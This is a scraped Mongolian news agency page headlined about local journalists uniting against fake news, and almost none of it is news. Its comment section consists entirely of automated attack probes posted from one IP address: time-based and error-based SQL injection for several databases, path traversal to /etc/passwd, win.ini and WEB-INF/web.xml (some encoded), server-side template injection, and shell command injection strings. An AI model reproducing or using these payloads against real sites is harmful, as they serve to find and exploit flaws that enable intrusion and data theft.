Орон нутгийн сэтгүүлчид хуурамч мэдээллийн эсрэг нэгдэв

ВИДЕО МЭДЭЭ
montastudio@montsame.gov.mn
2022-04-08 17:35:00
Холбоотой мэдээ
Сэтгэгдлүүд
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('g',12)='g 194.163.191.42 24 өдөр

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('z',0)='z 194.163.191.42 24 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:12 194.163.191.42 24 өдөр

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 194.163.191.42 24 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(12))::text>'0 194.163.191.42 24 өдөр

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 194.163.191.42 24 өдөр

  123456
 • admin"and(select*from(select+sleep(12))a/**/union/**/select+1)=" 194.163.191.42 24 өдөр

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 194.163.191.42 24 өдөр

  123456
 • ../../../../WEB-INF/web.xml;admin 194.163.191.42 24 өдөр

  123456
 • admin'and(select*from(select+sleep(12))a/**/union/**/select+1)=' 194.163.191.42 24 өдөр

  123456
 • ../../../../WEB-INF/web.xml 194.163.191.42 24 өдөр

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 194.163.191.42 24 өдөр

  123456
 • ../../../WEB-INF/web.xml;admin 194.163.191.42 24 өдөр

  123456
 • admin"and"d"="x 194.163.191.42 24 өдөр

  123456
 • ../../../WEB-INF/web.xml 194.163.191.42 24 өдөр

  123456
 • admin"and"m"="m 194.163.191.42 24 өдөр

  123456
 • ../../WEB-INF/web.xml;admin 194.163.191.42 24 өдөр

  123456
 • admin'and'k'='x 194.163.191.42 24 өдөр

  123456
 • ../../WEB-INF/web.xml 194.163.191.42 24 өдөр

  123456
 • admin'and'o'='o 194.163.191.42 24 өдөр

  123456
 • ../WEB-INF/web.xml;admin 194.163.191.42 24 өдөр

  123456
 • admin 194.163.191.42 24 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('d',12)='d
 • ../WEB-INF/web.xml 194.163.191.42 24 өдөр

  123456
 • admin 194.163.191.42 24 өдөр

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('x',0)='x
 • admin 194.163.191.42 24 өдөр

  123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('r',12)
 • WEB-INF/web.xml;admin 194.163.191.42 24 өдөр

  123456
 • admin 194.163.191.42 24 өдөр

  123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('p',0)
 • WEB-INF/web.xml 194.163.191.42 24 өдөр

  123456
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 194.163.191.42 24 өдөр

  123456
 • admin 194.163.191.42 24 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:12
 • admin 194.163.191.42 24 өдөр

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 194.163.191.42 24 өдөр

  123456
 • ../../../../../../Windows/win.iniadmin 194.163.191.42 24 өдөр

  123456
 • ./../../../../../../Windows/win.ini 194.163.191.42 24 өдөр

  123456
 • admin 194.163.191.42 24 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:12'/**/
 • admin 194.163.191.42 24 өдөр

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • ../../../../../../Windows/win.ini 194.163.191.42 24 өдөр

  123456
 • admin 194.163.191.42 24 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(12))::text>'0
 • admin 194.163.191.42 24 өдөр

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin 194.163.191.42 24 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(12))>0/**/
 • admin 194.163.191.42 24 өдөр

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 194.163.191.42 24 өдөр

  123456
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 24 өдөр

  123456
 • admin 194.163.191.42 24 өдөр

  123456"and(select*from(select+sleep(12))a/**/union/**/select+1)="
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 24 өдөр

  123456
 • admin 194.163.191.42 24 өдөр

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 194.163.191.42 24 өдөр

  123456
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 194.163.191.42 24 өдөр

  123456
 • admin 194.163.191.42 24 өдөр

  123456'and(select*from(select+sleep(12))a/**/union/**/select+1)='
 • ..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 24 өдөр

  123456
 • .\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 24 өдөр

  123456
 • admin 194.163.191.42 24 өдөр

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • admin 194.163.191.42 24 өдөр

  (select*from(select+sleep(12)union/**/select+1)a)
 • ..\..\..\..\..\..\Windows\win.ini 194.163.191.42 24 өдөр

  123456
 • admin 194.163.191.42 24 өдөр

  (select*from(select+sleep(0)union/**/select+1)a)
 • admin 194.163.191.42 24 өдөр

  123456"and"p"="c
 • admin 194.163.191.42 24 өдөр

  123456"and"t"="t
 • admin 194.163.191.42 24 өдөр

  123456'and'w'='r
 • admin 194.163.191.42 24 өдөр

  123456'and'f'='f
 • admin 194.163.191.42 24 өдөр

  123456/**/and+4=8
 • admin 194.163.191.42 24 өдөр

  123456/**/and+1=1
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 24 өдөр

  123456
 • admin'"\( 194.163.191.42 24 өдөр

  123456
 • admin鎈'"\( 194.163.191.42 24 өдөр

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 24 өдөр

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 24 өдөр

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1804324289')))>'0 194.163.191.42 24 өдөр

  123456
 • %u2215etc%u2215passwd 194.163.191.42 24 өдөр

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1609399246'))) 194.163.191.42 24 өдөр

  123456
 • %2fetc%2fpasswd 194.163.191.42 24 өдөр

  123456
 • admin/**/and/**/cast(md5('1023271878')as/**/int)>0 194.163.191.42 24 өдөр

  123456
 • /etc/passwdadmin 194.163.191.42 24 өдөр

  123456
 • admin'and(select'1'from/**/cast(md5(1344126489)as/**/int))>'0 194.163.191.42 24 өдөр

  123456
 • extractvalue(1,concat(char(126),md5(1710085303))) 194.163.191.42 24 өдөр

  123456
 • /etc/passwd 194.163.191.42 24 өдөр

  123456
 • admin 194.163.191.42 24 өдөр

  <%- 971380460+891488857 %>
 • admin 194.163.191.42 24 өдөр

  expr 885826383 + 906397484
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 194.163.191.42 24 өдөр

  123456
 • admin"and/**/extractvalue(1,concat(char(126),md5(1227690987)))and" 194.163.191.42 24 өдөр

  123456
 • admin 194.163.191.42 24 өдөр

  #set($c=828863236+842366078)${c}$c
 • admin 194.163.191.42 24 өдөр

  123456&set /A 855651769+892449692
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 194.163.191.42 24 өдөр

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1147366597)))and' 194.163.191.42 24 өдөр

  123456
 • admin 194.163.191.42 24 өдөр

  ${(828209429+990699770)?c}
 • ./../../../../../../etc/passwd 194.163.191.42 24 өдөр

  123456
 • admin 194.163.191.42 24 өдөр

  123456'"\(
 • admin 194.163.191.42 24 өдөр

  123456$(expr 958638940 + 937852262)
 • admin 194.163.191.42 24 өдөр

  ${903929350+853025318}
 • admin 194.163.191.42 24 өдөр

  123456|expr 856207082 + 908546623
 • admin 194.163.191.42 24 өдөр

  /*1*/{{979960373+844808110}}
 • ../../../../../../etc/passwdadmin 194.163.191.42 24 өдөр

  123456
 • admin 194.163.191.42 24 өдөр

  123456鎈'"\(
 • admin 194.163.191.42 24 өдөр

  123456 expr 890737348 + 846730689
 • ../../../../../../etc/passwd 194.163.191.42 24 өдөр

  123456
 • admin 194.163.191.42 24 өдөр

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1517099149')))>'0
 • admin 194.163.191.42 24 өдөр

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1411332475')))
 • admin 194.163.191.42 24 өдөр

  123456
 • admin 194.163.191.42 24 өдөр

  123456
 • admin 194.163.191.42 24 өдөр

  123456/**/and/**/cast(md5('1953238778')as/**/int)>0
 • admin 194.163.191.42 24 өдөр

  123456
 • <%- 868285428+850860712 %> 194.163.191.42 24 өдөр

  123456
 • admin 194.163.191.42 24 өдөр

  123456'and(select'1'from/**/cast(md5(1851069865)as/**/int))>'0
 • #set($c=933901503+927914862)${c}$c 194.163.191.42 24 өдөр

  123456
 • '-var_dump(md5(965971709))-' 194.163.191.42 24 өдөр

  123456
 • ${@var_dump(md5(360948548))}; 194.163.191.42 24 өдөр

  123456
 • ${(966447504+809473983)?c} 194.163.191.42 24 өдөр

  123456
 • admin 194.163.191.42 24 өдөр

  '-var_dump(md5(507711814))-'
 • admin 194.163.191.42 24 өдөр

  extractvalue(1,concat(char(126),md5(1412073833)))
 • ${929737003+942565339} 194.163.191.42 24 өдөр

  123456
 • expr 820739747 + 839829772 194.163.191.42 24 өдөр

  123456
 • admin 194.163.191.42 24 өдөр

  123456"and/**/extractvalue(1,concat(char(126),md5(1258511261)))and"
 • admin 194.163.191.42 24 өдөр

  ${@var_dump(md5(619857048))};
 • admin 194.163.191.42 24 өдөр

  123456'and/**/extractvalue(1,concat(char(126),md5(1020696108)))and'
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 24 өдөр

  123456
 • admin 194.163.191.42 24 өдөр

  123456
 • admin&set /A 927276498+891511068 194.163.191.42 24 өдөр

  123456
 • ${972984102+954900404} 194.163.191.42 24 өдөр

  123456
 • admin 194.163.191.42 24 өдөр

  123456
 • sxugpqduuiwzrgaiwtzf 194.163.191.42 24 өдөр

  123456
 • admin$(expr 865581871 + 856303874) 194.163.191.42 24 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 194.163.191.42 24 өдөр

  123456
 • admin 194.163.191.42 24 өдөр

  123456
 • admin 194.163.191.42 24 өдөр

  123456
 • admin 194.163.191.42 24 өдөр

  123456
 • admin 194.163.191.42 24 өдөр

  sxugpqduuiwzrgaiwtzf
 • admin|expr 811965011 + 838827553 194.163.191.42 24 өдөр

  123456
 • /*1*/{{830343044+876618595}} 194.163.191.42 24 өдөр

  123456
 • admin 194.163.191.42 24 өдөр

  ${904793377+892134638}
 • admin expr 931721161 + 861710739 194.163.191.42 24 өдөр

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 24 өдөр

  123456
 • admin 194.163.191.42 24 өдөр

  123456
 • admin 194.163.191.42 24 өдөр

  123456